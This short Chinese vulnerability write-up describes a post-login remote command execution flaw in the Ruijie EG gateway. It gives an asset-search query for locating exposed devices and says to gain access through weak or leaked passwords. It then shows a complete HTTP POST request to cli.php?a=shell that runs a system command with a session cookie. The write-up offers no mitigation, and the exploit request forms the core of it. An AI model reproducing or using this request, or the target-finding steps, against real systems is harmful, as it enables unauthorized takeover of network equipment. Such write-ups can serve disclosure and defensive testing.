登录 白背景

锐捷 EG易网关cli存在后台远程命令执行漏洞

<font style="color:rgb(38, 38, 38);">一、漏洞简介</font><font style="color:rgb(38, 38, 38);">
</font><font style="color:rgb(38, 38, 38);">锐捷 EG易网关cli存在后台远程命令执行漏洞。
</font><font style="color:rgb(38, 38, 38);">二、影响版本</font>

锐捷EG易网关

<font style="color:rgb(38, 38, 38);">
</font><font style="color:rgb(38, 38, 38);">三、资产测绘</font>

app="Ruijie-EG易网关"

<font style="color:rgb(38, 38, 38);">
</font><font style="color:rgb(38, 38, 38);">●登录页面</font>

1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png

<font style="color:rgb(38, 38, 38);">四、漏洞复现</font>

  1. 通过弱口令或账号密码泄露漏洞登录后台获取cookie

1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png

  1. 通过上一步获取的cookie执行命令
POST /cli.php?a=shell HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/x-www-form-urlencoded
Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=j4rjrjdtilmhj824o98sv11r45; helpKey=home_sys;user=admin; 
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

notdelay=true&command=id

1711298769718-5281899e-c512-4cdb-b948-3ab79506923b.png

原文: https://www.yuque.com/xiaokp7/ocvun2/rggbsmpwgacek7ih